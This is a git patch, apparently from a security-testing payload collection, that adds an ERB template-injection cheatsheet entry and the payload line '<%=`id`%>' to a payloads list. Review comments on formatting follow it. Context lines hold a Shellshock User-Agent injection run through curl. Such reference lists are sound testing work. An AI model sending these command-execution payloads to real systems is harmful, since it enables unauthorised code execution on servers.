From 1fd1c34ea59e164f7548d67dbe9276ee09f6aacc Mon Sep 17 00:00:00 2001 From: EdOverflow Date: Fri, 14 Jul 2017 15:35:52 +0100 Subject: [PATCH] Add template injection. --- README.md | 1 + cheatsheets/template-injection.md | 7 +++++++ payloads.txt | 4 +++- 3 files changed, 11 insertions(+), 1 deletion(-) create mode 100644 cheatsheets/template-injection.md diff --git a/README.md b/README.md index 9aa1f94..7a489ae 100644 --- a/README.md +++ b/README.md @@ -9,6 +9,7 @@ - [RCE](cheatsheets/rce.md) - [Open Redirect](cheatsheets/open-redirect.md) - [Crypto](cheatsheets/crypto.md) +- [Template Injection](cheatsheets/template-injection.md) - [Content Injection](cheatsheets/content-injection.md) # Contributors diff --git a/cheatsheets/template-injection.md b/cheatsheets/template-injection.md new file mode 100644 index 0000000..c09d718 --- /dev/null +++ b/cheatsheets/template-injection.md @@ -0,0 +1,7 @@ +## Template Injection + +**Ruby** + +```ruby +<%=`id`%> +``` \ No newline at end of file diff --git a/payloads.txt b/payloads.txt index 37931af..6dc6bf7 100644 --- a/payloads.txt +++ b/payloads.txt 
@@ -89,4 +89,6 @@ curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/ 012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234 -0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345 \ No newline at end of file +0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345 + +<%=`id`%> \ No newline at end of file
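Review bot: In cheatsheets/template-injection.md the "**Ruby**" label and the `ruby` fence tag name the language, but the `<%= ... %>` delimiters in the entry are ERB tag syntax, so it only applies where input reaches an ERB template. Suggest labelling the entry ERB and tagging the fence `erb`, and adding one sentence saying which template engine it applies to, since the file as added is a heading and a bare payload. The new file also ends with "\ No newline at end of file"; add the trailing newline before merge.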
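Review bot: In the payloads.txt hunk the new last line, "<%=`id`%>", is again left without a trailing newline, which is the same condition that made this patch remove and re-add the unchanged digit line just to terminate it. End the file with a newline so the next addition shows up as a one-line diff. The blank line added before the new entry is also worth checking against how the file is consumed, since anything reading it line by line will see an empty entry there.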